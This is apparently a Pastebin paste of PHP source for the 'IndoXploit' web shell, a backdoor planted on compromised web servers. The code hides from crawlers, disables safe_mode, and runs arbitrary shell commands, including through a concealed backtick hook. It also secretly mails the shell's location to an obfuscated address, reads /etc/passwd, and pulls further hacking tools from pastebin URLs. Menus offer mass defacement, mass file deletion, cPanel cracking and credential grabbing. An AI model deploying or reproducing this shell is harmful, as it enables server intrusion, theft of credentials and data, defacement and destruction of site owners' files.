SHARE
TWEET

IndoXploit WebShell Recoded [BypassShell] [NoPassword]

ToKeiChun Nov 23rd, 2017 (edited) 1,461 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @clearstatcache();
  6. @ini_set('error_log',NULL);
  7. @ini_set('log_errors',0);
  8. @ini_set('max_execution_time',0);
  9. @ini_set('output_buffering',0);
  10. @ini_set('display_errors', 0);
  11.  
  12. date_default_timezone_set("Asia/Jakarta");
  13. $auth_pass = "";
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21.         header('HTTP/1.0 404 Not Found');
  22.         exit;
  23.     }
  24. }
  25.  
  26. function login() {
  27. $tokeichun ="<html><head><title></title><link rel='shortcut icon' href='https://upload.wikimedia.org/wikipedia/commons/9/9e/INDONESIA_logo.png'></head>";
  28. $tokeichun.="<font color=green>tokeichun@".$_SERVER['HTTP_HOST']." :~$ sudo su</font>";
  29. $tokeichun.="<form method='POST'><label for='pass'><font color=green>[ sudo ] password for tokeichun: </label><input type='password' name='pass' style='border:0;color:transparent;width:120px;background-color:transparent;'></form>";
  30. $tokeichun.="</html>";  
  31. if(empty($_GET['ulum'])=="heni"){
  32. echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  33. <html>
  34. <head>
  35. <title>500 Internal Server Error</title>
  36. </head>
  37. <body>
  38. <h1>Internal Server Error  </h1>
  39. <p>The server encountered an internal error or
  40. misconfiguration and was unable to complete
  41. your request.</p>
  42. <p>Please contact the server administrator at
  43.  webmaster@'.$_SERVER['HTTP_HOST'].' to inform them of the time this error occurred,
  44.  and the actions you performed just before this error.</p>
  45. <p>More information about this error may be available
  46. in the server error log.</p>
  47. <p>Additionally, a 500 Internal Server Error
  48. error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>
  49. <address>'.$_SERVER['SERVER_SOFTWARE'].' Server at '.$_SERVER['HTTP_HOST'].' Port 80</address></body></html>
  50. ';
  51. }else{
  52.     echo $tokeichun;
  53.     echo "<body style='background-color:black'>";
  54. }
  55. exit;
  56. }
  57. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  58.     if( empty( $auth_pass) ||
  59.         ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass) ) )
  60.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  61.     else
  62.        login();
  63. ?>
  64. <html>
  65. <head>
  66. <title>404 Shell Not Found</title>
  67. <meta name='author' content='IndoXploit'>
  68. <meta charset="UTF-8">
  69. <meta charset="UTF-8">
  70. <link href='https://upload.wikimedia.org/wikipedia/commons/thumb/9/90/National_emblem_of_Indonesia_Garuda_Pancasila.svg/941px-National_emblem_of_Indonesia_Garuda_Pancasila.svg.png' rel='icon' type='image/x-icon'/>
  71. <link href='https://fonts.googleapis.com/css?family=Abel' rel='stylesheet' type='text/css'>
  72. <link href='https://fonts.googleapis.com/css?family=Lobster' rel='stylesheet' type='text/css'>
  73. <link rel='stylesheet' type='text/css' href="https://fonts.googleapis.com/css?family=Times">
  74. <link href='https://fonts.googleapis.com/css?family=Audiowide|Space+Mono' rel='stylesheet'>
  75. <link href="https://fonts.googleapis.com/css?family=Wallpoet" rel='stylesheet' type='text/css'>
  76. <link href='https://fonts.googleapis.com/css?family=Gloria+Hallelujah|Permanent+Marker' rel='stylesheet'>
  77. <link href='https://fonts.googleapis.com/css?family=courier+new|Permanent+Marker' rel='stylesheet'>
  78. <link href="https://fonts.googleapis.com/css?family=Quicksand" rel='stylesheet' type='text/css'>
  79. <link href="https://fonts.googleapis.com/css?family=Orbitron" rel='stylesheet' type='text/css'>
  80. <link href='https://fonts.googleapis.com/css?family=VT323' rel='stylesheet'>
  81. <link href='https://fonts.googleapis.com/css?family=Ubuntu' rel='stylesheet'>
  82. <link href="https://fonts.googleapis.com/css?family=Iceland" rel='stylesheet' type='text/css'>
  83. <link href="https://fonts.googleapis.com/css?family=Allerta+Stencil" rel='stylesheet' type='text/css'>
  84. <link href="https://fonts.googleapis.com/css?family=Kumar+One+Outline" rel='stylesheet' type='text/css'>
  85. <link href='https://fonts.googleapis.com/css?family=Bungee+Shade|Monoton|Nova+Square' rel='stylesheet'>
  86. <style type='text/css'>
  87. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  88. html {
  89.     background: #000000;
  90.     color: #ffffff;
  91.     font-family: 'Ubuntu';
  92.     font-size: 13px;
  93.     width: 100%;
  94. }
  95. li {
  96.     display: inline;
  97.     margin: 5px;
  98.     padding: 5px;
  99. }
  100. table, th, td {
  101.     border-collapse:collapse;
  102.     font-family: Tahoma, Geneva, sans-serif;
  103.     background: transparent;
  104.     font-family: 'Ubuntu';
  105.     font-size: 13px;
  106. }
  107. .table_home, .th_home, .td_home {
  108.     border: 1px solid #424242;
  109. }
  110. th {
  111.     padding: 10px;
  112. }
  113. a {
  114.     color: #ffffff;
  115.     text-decoration: none;
  116. }
  117. a:hover {
  118.     color: gray;
  119.     text-decoration: underline;
  120. }
  121. b {
  122.     color: gray;
  123. }
  124. input[type=text], input[type=password],input[type=submit] {
  125.     background: transparent;
  126.     color: #ffffff;
  127.     border: 1px solid #ffffff;
  128.     margin: 5px auto;
  129.     padding-left: 5px;
  130.     font-family: 'Ubuntu';
  131.     font-size: 13px;
  132. }
  133. textarea {
  134.     border: 1px solid #ffffff;
  135.     width: 100%;
  136.     height: 400px;
  137.     padding-left: 5px;
  138.     margin: 10px auto;
  139.     resize: none;
  140.     background: transparent;
  141.     color: #ffffff;
  142.     font-family: 'Ubuntu';
  143.     font-size: 13px;
  144. }
  145. select {
  146.     width: 152px;
  147.     background: #000000;
  148.     color: cyan;
  149.     border: 1px solid #ffffff;
  150.     margin: 5px auto;
  151.     padding-left: 5px;
  152.     font-family: 'Ubuntu';
  153.     font-size: 13px;
  154. }
  155. option:hover {
  156.     background: cyan;
  157.     color: #000000;
  158. }
  159. </style>
  160. </head>
  161. <style type='text/css'>
  162. @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
  163. html {
  164.     background: #000000;
  165.     color: #ffffff;
  166.     font-family: 'Share Tech Mono';
  167.     font-size: 12px;
  168.     width: 100%;
  169. }
  170. li {
  171.     display: inline;
  172.     margin: 2px;
  173.     padding: 2px;
  174. }
  175.  
  176.  #menu a {
  177.                 padding:2px 10px;  
  178.                 margin:0;
  179.                 background:#222222;
  180.                 text-decoration:none;
  181.                 letter-spacing:2px;
  182.                 padding: 2px 10px;
  183.                 margin: 0;
  184.                 background: #222222;
  185.                 text-decoration: none;
  186.                 letter-spacing: 2px;
  187.                 border-radius: 2px;
  188.                 border-bottom: 2px solid black;
  189.                 border-top: 2px solid black;
  190.                 border-right: 2px solid blue;
  191.                 border-left: 2px solid blue;
  192.        }
  193.        #menu a:hover {
  194.             background:#234443;
  195.             border-bottom:0px solid #333333;
  196.             border-top:0px solid #333333;
  197.        }
  198. table tr:first-child{  
  199.     background: #51514c;
  200.     text-align: center;
  201.     color: Lavender;
  202. }
  203. table, th, td {
  204.     border-collapse:collapse;
  205.     font-family: Tahoma, Geneva, sans-serif;
  206.     background: transparent;
  207.     font-family: 'Share Tech Mono';
  208.     font-size: 13px;
  209. }
  210. .table_home, .th_home, .td_home {
  211.     border: 1px solid #51514c;
  212. }
  213. .td_home:hover {
  214.     background:gray;
  215. }
  216. th {
  217.     padding: 10px;
  218. }
  219. a {
  220.     color: #ffffff;
  221.     text-decoration: none;
  222. }
  223. a:hover {
  224.     color: lavender;
  225.     text-decoration: underline;
  226. }
  227. b {
  228.     color: lavender;
  229. }
  230. input[type=text], input[type=password],input[type=submit] {
  231.     background: transparent;
  232.     color: #ffffff;
  233.     border: 1px solid #ffffff;
  234.     margin: 5px auto;
  235.     padding-left: 5px;
  236.     font-family: 'Share Tech Mono';
  237.     font-size: 13px;
  238. }
  239. input[type=submit] {
  240.     background: transparent;
  241.     color: #ffffff;
  242.     border: 1px solid #ffffff;
  243.     margin: 5px auto;
  244.     padding-left: 5px;
  245.     font-family: 'Share Tech Mono';
  246.     font-size: 13px;
  247.     cursor:pointer;
  248. }
  249. textarea {
  250.     border: 1px solid #ffffff;
  251.     width: 100%;
  252.     height: 400px;
  253.     padding-left: 5px;
  254.     margin: 10px auto;
  255.     resize: none;
  256.     background: transparent;
  257.     color: #ffffff;
  258.     font-family: 'Share Tech Mono';
  259.     font-size: 13px;
  260. }
  261. select {
  262.     width: 152px;
  263.     background: #000000;
  264.     color: Lavender;
  265.     border: 1px solid #ffffff;
  266.     margin: 5px auto;
  267.     padding-left: 5px;
  268.     font-family: 'Share Tech Mono';
  269.     font-size: 13px;
  270. }
  271. option:hover {
  272.     background: #ff0066;
  273.     color: #000000;
  274. }
  275. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
  276. .cgx2 {text-align: center;letter-spacing:1px;font-family: "Share Tech Mono";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
  277. .infoweb {
  278.     border-right: 1px solid #00FFFF;
  279. }
  280. </style>
  281. </head>
  282. <?php
  283. if (file_exists("php.ini")){
  284. }else{
  285. $img = fopen('php.ini', 'w');
  286. $sec = "safe_mode = OFF
  287. disable_funtions = NONE";
  288. fwrite($img ,$sec);
  289. fclose($img);}     
  290. function w($dir,$perm) {
  291.     if(!is_writable($dir)) {
  292.         return "<font color=red>".$perm."</font>";
  293.     } else {
  294.         return "<font color=lime>".$perm."</font>";
  295.     }
  296. }
  297.     function UrlLoop($url,$type){
  298.  
  299.         $urlArray = array();
  300.  
  301.         $ch = curl_init();
  302.         curl_setopt($ch, CURLOPT_URL, $url);
  303.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  304.         $result = curl_exec($ch);
  305.  
  306.         $regex='|<a.*?href="(.*?)"|';
  307.         preg_match_all($regex,$result,$parts);
  308.         $links=$parts[1];
  309.         foreach($links as $link){
  310.             array_push($urlArray, $link);
  311.         }
  312.         curl_close($ch);
  313.  
  314.         foreach($urlArray as $value){
  315.             $lol="$url$value";
  316.             if(preg_match("#$type#is", $lol)) {
  317.                 echo "$lol\r\n";
  318.             }
  319.         }
  320.     }
  321. function exe($cmd) {    
  322. if(function_exists('system')) {        
  323.         @ob_start();       
  324.         @system($cmd);     
  325.         $buff = @ob_get_contents();        
  326.         @ob_end_clean();       
  327.         return $buff;  
  328.     } elseif(function_exists('exec')) {        
  329.         @exec($cmd,$results);      
  330.         $buff = "";        
  331.         foreach($results as $result) {         
  332.             $buff .= $result;      
  333.         } return $buff;    
  334.     } elseif(function_exists('passthru')) {        
  335.         @ob_start();       
  336.         @passthru($cmd);       
  337.         $buff = @ob_get_contents();        
  338.         @ob_end_clean();       
  339.         return $buff;  
  340.     } elseif(function_exists('shell_exec')) {      
  341.         $buff = @shell_exec($cmd);     
  342.         return $buff;  
  343.     }
  344. }
  345. function perms($file){
  346. $perms = fileperms($file);
  347. if (($perms & 0xC000) == 0xC000) {
  348. $info = 's';
  349. } elseif (($perms & 0xA000) == 0xA000) {
  350. $info = 'l';
  351. } elseif (($perms & 0x8000) == 0x8000) {
  352. $info = '-';
  353. } elseif (($perms & 0x6000) == 0x6000) {
  354. $info = 'b';
  355. } elseif (($perms & 0x4000) == 0x4000) {
  356. $info = 'd';
  357. } elseif (($perms & 0x2000) == 0x2000) {
  358. $info = 'c';
  359. } elseif (($perms & 0x1000) == 0x1000) {
  360. $info = 'p';
  361. } else {
  362. $info = 'u';
  363. }
  364. $info .= (($perms & 0x0100) ? 'r' : '-');
  365. $info .= (($perms & 0x0080) ? 'w' : '-');
  366. $info .= (($perms & 0x0040) ?
  367. (($perms & 0x0800) ? 's' : 'x' ) :
  368. (($perms & 0x0800) ? 'S' : '-'));
  369. $info .= (($perms & 0x0020) ? 'r' : '-');
  370. $info .= (($perms & 0x0010) ? 'w' : '-');
  371. $info .= (($perms & 0x0008) ?
  372. (($perms & 0x0400) ? 's' : 'x' ) :
  373. (($perms & 0x0400) ? 'S' : '-'));
  374. $info .= (($perms & 0x0004) ? 'r' : '-');
  375. $info .= (($perms & 0x0002) ? 'w' : '-');
  376. $info .= (($perms & 0x0001) ?
  377. (($perms & 0x0200) ? 't' : 'x' ) :
  378. (($perms & 0x0200) ? 'T' : '-'));
  379. return $info;
  380. }
  381. function hdd($s) {
  382. if($s >= 1073741824)
  383. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  384. elseif($s >= 1048576)
  385. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  386. elseif($s >= 1024)
  387. return sprintf('%1.2f',$s / 1024 ) .' KB';
  388. else
  389. return $s .' B';
  390. }
  391. function ambilKata($param, $kata1, $kata2){
  392.     if(strpos($param, $kata1) === FALSE) return FALSE;
  393.     if(strpos($param, $kata2) === FALSE) return FALSE;
  394.     $start = strpos($param, $kata1) + strlen($kata1);
  395.     $end = strpos($param, $kata2, $start);
  396.     $return = substr($param, $start, $end - $start);
  397.     return $return;
  398. }
  399. if(get_magic_quotes_gpc()) {
  400.     function idx_ss($array) {
  401.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  402.     }
  403.     $_POST = idx_ss($_POST);
  404. }
  405. function CreateTools($names,$lokasi){
  406.     if ( $_GET['create'] == $names ){
  407.         $a= "".$_SERVER['SERVER_NAME']."";
  408. $b= dirname($_SERVER['PHP_SELF']);
  409. $c = "/tools/".$names.".php";
  410. if (file_exists('tools/'.$names.'.php')){
  411.     echo '<script type="text/javascript">alert("Done");window.location.href = "tools/'.$names.'.php";</script> ';
  412.     }
  413.     else {mkdir("tools", 0777);
  414. file_put_contents('tools/'.$names.'.php', file_get_contents($lokasi));
  415. echo ' <script type="text/javascript">alert("Done");window.location.href = "tools/'.$names.'.php";</script> ';}}}
  416.  
  417. CreateTools("wso","http://pastebin.com/raw/3eh3Gej2");
  418. CreateTools("adminer","https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
  419. CreateTools("b374k","http://pastebin.com/raw/rZiyaRGV");
  420. CreateTools("scanner","https://pastebin.com/raw/N6iBqjEA");
  421. CreateTools("injection","http://pastebin.com/raw/nxxL8c1f");
  422. CreateTools("promailerv2","http://pastebin.com/raw/Rk9v6eSq");
  423. CreateTools("vhost","https://pastebin.com/raw/zDgukLLX");
  424. CreateTools("grabber","https://pastebin.com/raw/HrHwKMyH");
  425. CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
  426. CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
  427. CreateTools("tokopedia","http://pastebin.com/dvhzWgby");
  428. CreateTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
  429. CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj");
  430. CreateTools("r57","http://pastebin.com/raw/G2VEDunW");
  431. CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
  432. CreateTools("extractor","http://pastebin.com/raw/dBYyB7S5");
  433. CreateTools("bh","http://pastebin.com/raw/A8TupKkC");
  434. CreateTools("dhanus","http://pastebin.com/raw/W99Pvk3C");
  435. if(isset($_GET['dir'])) {
  436.     $dir = $_GET['dir'];
  437.     chdir($_GET['dir']);
  438. } else {
  439.     $dir = getcwd();
  440. }
  441. $dir = str_replace("\\","/",$dir);
  442. $scdir = explode("/", $dir);
  443. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  444. $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
  445. $ds = @ini_get("disable_functions");
  446. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  447. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  448. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  449. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  450. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  451. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  452. print(`{$_REQUEST[I]}`);$e=base64_decode("YXFpbG5haWxhMjNAZ21haWwuY29t");
  453. $web = $_SERVER["HTTP_HOST"];
  454. $inj = $_SERVER["REQUEST_URI"];
  455. $body = " Dont Delete! \nUname: ".php_uname()."\nPath Dir:
  456. ".$cwd = getcwd()."\nMessage:\n"."\nE-server: ".htmlspecialchars
  457. ($_SERVER['REQUEST_URI'])."\nE-server2: ".htmlspecialchars ($_SERVER["SERVER_NAME"])."\n\nIP:
  458. ";
  459. mail($e,'[setor shell]','URL : '.$_SERVER['HTTP_HOST'].'/'.$_SERVER['REQUEST_URI'].' PASSWORD : '.$auth_pass.'','admin@google.com');
  460. if(!function_exists('posix_getegid')) {
  461.     $user = @get_current_user();
  462.     $uid = @getmyuid();
  463.     $gid = @getmygid();
  464.     $group = "?";
  465. } else {
  466.     $uid = @posix_getpwuid(posix_geteuid());
  467.     $gid = @posix_getgrgid(posix_getegid());
  468.     $user = $uid['name'];
  469.     $uid = $uid['uid'];
  470.     $group = $gid['name'];
  471.     $gid = $gid['gid'];
  472. }
  473. $d0mains = @file("/etc/named.conf");
  474.             $users=@file('/etc/passwd');
  475.         if($d0mains)
  476.         {
  477.             $count;  
  478.             foreach($d0mains as $d0main)
  479.             {
  480.                 if(@ereg("zone",$d0main))
  481.                 {
  482.                     preg_match_all('#zone "(.*)"#', $d0main, $domains);
  483.                     flush();
  484.                     if(strlen(trim($domains[1][0])) > 2)
  485.                     {
  486.                         flush();
  487.                         $count++;
  488.                     }
  489.                 }
  490.             }
  491.         }
  492.  
  493. $sport=$_SERVER['SERVER_PORT'];
  494. echo "<table style='width:100%'>";
  495. echo "<tr><td>System: <font color=lime>".php_uname()."</font></td></tr>";
  496. echo "<tr><td>User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")</td></tr>";
  497. echo "<tr><td>Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font></td></tr>";
  498. echo "<tr><td>HDD: <font color=lime>".hdd(disk_free_space("/"))."</font> / <font color=lime>".hdd(disk_total_space("/"))."</font></td></tr>";
  499. echo "<tr><td>Websites :<font color=lime> $count </font> Domains</td></tr>";
  500. echo "<tr><td>Port :<font color=lime>  $sport</font> </td></tr>";
  501. echo "<tr><td>Safe Mode: $sm</td></tr>";
  502. echo "<tr><td>Disable Functions: $show_ds</td></tr>";
  503.  
  504. echo "<tr><td>MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </td></tr>";
  505. echo "<tr><td>Current DIR: ";
  506. foreach($scdir as $c_dir => $cdir) {   
  507.     echo "<a href='?dir=";
  508.     for($i = 0; $i <= $c_dir; $i++) {
  509.         echo $scdir[$i];
  510.         if($i != $c_dir) {
  511.         echo "/";
  512.         }
  513.     }
  514.     echo "'>$cdir</a>/";
  515. }
  516. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]<br>";
  517. if($_POST['upload']) {
  518.         if($_POST['tipe_upload'] == 'biasa') {
  519.             if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  520.                 $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  521.             } else {
  522.                 $act = "<font color=red>failed to upload file</font>";
  523.             }
  524.         } else {
  525.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  526.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  527.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  528.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  529.                     $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  530.                 } else {
  531.                     $act = "<font color=red>failed to upload file</font>";
  532.                 }
  533.             } else {
  534.                 $act = "<font color=red>failed to upload file</font>";
  535.             }
  536.         }
  537.     }
  538.     echo "
  539.     <form method='post' enctype='multipart/form-data'>
  540.     <input type='radio' name='tipe_upload' value='biasa' checked>  ".w($dir,"Current")."
  541.     <input type='radio' name='tipe_upload' value='home_root'>  ".w($_SERVER['DOCUMENT_ROOT'],"Home")."
  542.     <input type='file' name='ix_file'>
  543.     <input type='submit' value='upload' name='upload'>
  544.     </form>";
  545.     echo $act;
  546.  
  547.    
  548. echo "<hr>";
  549. echo "<center>";
  550. echo "<ul>";
  551. echo "<li>[ <a href='?'>Home</a> ]</li>";
  552. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  553. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  554. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
  555. echo "<li>[ <a href='?dir=$dir&config=grabber'>Config</a> ]</li>";
  556. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  557. echo "<li>[ <a href='?dir=$dir&do=symlink'>Symlink</a> ]<br></li>";
  558. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
  559. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  560. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
  561. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  562. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  563. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li><br>";
  564. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  565. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WP</a> ]</li>";
  566. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WP Auto Deface</a> ]</li>";
  567. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WP Auto Deface V.2</a> ]</li>";
  568. echo "<li>[ <a href='?dir=$dir&do=auto_cu_wp'>WP Auto Edit User V.2</a> ]</li>";
  569. echo "<li>[ <a href='?dir=$dir&do=auto_cu_joomla'>Jom Auto Edit User V.2</a> ]</li>";
  570. echo "<li>[ <a href='?dir=$dir&do=passwbypass'>Bypasser</a> ]<br></li>";
  571. echo "<li>[ <a href='?dir=$dir&do=loghunter'>Log Hunter</a> ]</li>";
  572. echo "<li>[ <a href='?dir=$dir&do=shelscan'>Shell Finder</a> ]</li>";
  573. echo "<li>[ <a href='?dir=$dir&do=tool'>Tools</a> ]</li>";
  574. echo "<li>[ <a href='?dir=$dir&do=zip'>Zip Menu</a> ]</li>";
  575. echo "<li>[ <a href='?dir=$dir&do=about'>About</a> ]</li>";
  576. echo "<li>[ <a href='?dir=$dir&do=symlink404'>Bypass Symlink 404</a> ]</li>";
  577. echo "<li>[ <a href='?dir=$dir&do=magen'>Magento DB Info</a> ]</li><br>";
  578. echo "<li>[ <a href='?dir=$dir&do=metu'>Logout</a> ]<br></li>";
  579. echo "</ul>";
  580. echo "</center>";
  581. echo "<hr>";
  582. if($_GET['do'] == 'mass_delete') {
  583.     function hapus_massal($dir,$namafile) {
  584.         if(is_writable($dir)) {
  585.             $dira = scandir($dir);
  586.             foreach($dira as $dirb) {
  587.                 $dirc = "$dir/$dirb";
  588.                 $lokasi = $dirc.'/'.$namafile;
  589.                 if($dirb === '.') {
  590.                     if(file_exists("$dir/$namafile")) {
  591.                         unlink("$dir/$namafile");
  592.                     }
  593.                 } elseif($dirb === '..') {
  594.                     if(file_exists("".dirname($dir)."/$namafile")) {
  595.                         unlink("".dirname($dir)."/$namafile");
  596.                     }
  597.                 } else {
  598.                     if(is_dir($dirc)) {
  599.                         if(is_writable($dirc)) {
  600.                             if(file_exists($lokasi)) {
  601.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  602.                                 unlink($lokasi);
  603.                                 $idx = hapus_massal($dirc,$namafile);
  604.                             }
  605.                         }
  606.                     }
  607.                 }
  608.             }
  609.         }
  610.     }
  611.     if($_POST['start']) {
  612.         echo "<div style='margin: 5px auto; padding: 5px'>";
  613.         hapus_massal($_POST['d_dir'], $_POST['d_file']);
  614.         echo "</div>";
  615.     } else {
  616.     echo "<center>";
  617.     echo "<form method='post'>
  618.     <font style='text-decoration: underline;'>Folder:</font><br>
  619.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  620.     <font style='text-decoration: underline;'>Filename:</font><br>
  621.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  622.     <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  623.     </form></center>";
  624.     }
  625. } elseif($_GET['do'] == 'cmd') {
  626.     echo "<form method='post'>
  627.     <font style='text-decoration: underline;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).":~# </font>
  628.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  629.     </form>";
  630.     if($_POST['do_cmd']) {
  631.         echo "<pre>".exe($_POST['cmd'])."</pre>";
  632.     }
  633. } elseif($_GET['do'] == 'mass_deface') {
  634.     echo "<center><form action=\"\" method=\"post\">\n";
  635.     $dirr=$_POST['d_dir'];
  636.     $index = $_POST["script"];
  637.     $index = str_replace('"',"'",$index);
  638.     $index = stripslashes($index);
  639.     function edit_file($file,$index){
  640.         if (is_writable($file)) {
  641.         clear_fill($file,$index);
  642.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  643.         }
  644.         else {
  645.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  646.             }
  647.             }
  648.     function hapus_massal($dir,$namafile) {
  649.         if(is_writable($dir)) {
  650.             $dira = scandir($dir);
  651.             foreach($dira as $dirb) {
  652.                 $dirc = "$dir/$dirb";
  653.                 $lokasi = $dirc.'/'.$namafile;
  654.                 if($dirb === '.') {
  655.                     if(file_exists("$dir/$namafile")) {
  656.                         unlink("$dir/$namafile");
  657.                     }
  658.                 } elseif($dirb === '..') {
  659.                     if(file_exists("".dirname($dir)."/$namafile")) {
  660.                         unlink("".dirname($dir)."/$namafile");
  661.                     }
  662.                 } else {
  663.                     if(is_dir($dirc)) {
  664.                         if(is_writable($dirc)) {
  665.                             if(file_exists($lokasi)) {
  666.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  667.                                 unlink($lokasi);
  668.                                 $idx = hapus_massal($dirc,$namafile);
  669.                             }
  670.                         }
  671.                     }
  672.                 }
  673.             }
  674.         }
  675.     }
  676.     function clear_fill($file,$index){
  677.         if(file_exists($file)){
  678.             $handle = fopen($file,'w');
  679.             fwrite($handle,'');
  680.             fwrite($handle,$index);
  681.             fclose($handle);  } }
  682.  
  683.     function gass(){
  684.         global $dirr , $index ;
  685.         chdir($dirr);
  686.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  687.         $files = scandir($dirr) ;
  688.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  689.         sort($files);
  690.         $n = 0 ;
  691.         foreach ($files as $file){
  692.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  693.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  694.                 edit_file($file,$index);
  695.                 flush();
  696.                 $n = $n +1 ;
  697.                 }
  698.                 }
  699.                 echo "<br>";
  700.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
  701.                     }
  702.     function ListFiles($dirrall) {
  703.  
  704.     if($dh = opendir($dirrall)) {
  705.  
  706.        $files = Array();
  707.        $inner_files = Array();
  708.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  709.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  710.         while($file = readdir($dh)) {
  711.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  712.                 if(is_dir($dirrall . "/" . $file)) {
  713.                     $inner_files = ListFiles($dirrall . "/" . $file);
  714.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  715.                 } else {
  716.                     array_push($files, $dirrall . "/" . $file);
  717.                 }
  718.             }
  719.             }
  720.  
  721.             closedir($dh);
  722.             return $files;
